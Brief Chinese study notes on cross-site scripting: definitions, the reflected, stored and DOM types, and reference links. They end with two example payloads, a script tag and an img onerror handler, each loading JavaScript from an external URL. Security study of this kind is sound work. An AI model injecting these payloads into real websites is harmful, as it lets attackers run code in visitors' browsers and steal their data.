XSS(Cross Site Scripting)攻击全称跨站脚本攻击,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。xss就是在页面执行你所要执行的js。
Fuzz testing 模糊测试
point:“xss盲打”,“xss编码绕过”,“fuzzing xss”
参考
https://blog.csdn.net/u011781521/article/details/53894399
http://www.freebuf.com/articles/web/40520.html
xss攻击大全?
http://www.freebuf.com/author/Black-Hole
1:xss攻击可以分成两种类型:
1).非持久型攻击
2).持久型攻击
非持久型xss攻击:顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。
持久型xss攻击:持久型xss,会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。
反射型:经过后端,不经过数据库
存储型:经过后端,经过数据库
DOM:不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom – xss是通过url传入参数去控制触发的。
2:可以通过闭合html标签,增加onclick,onerror函数来实现各种操作
3:xss的利用
插入jsdaima
<script scr="js_url"></script>
<img src=x οnerrοr=appendChild(createElement('script')).src='js_url' />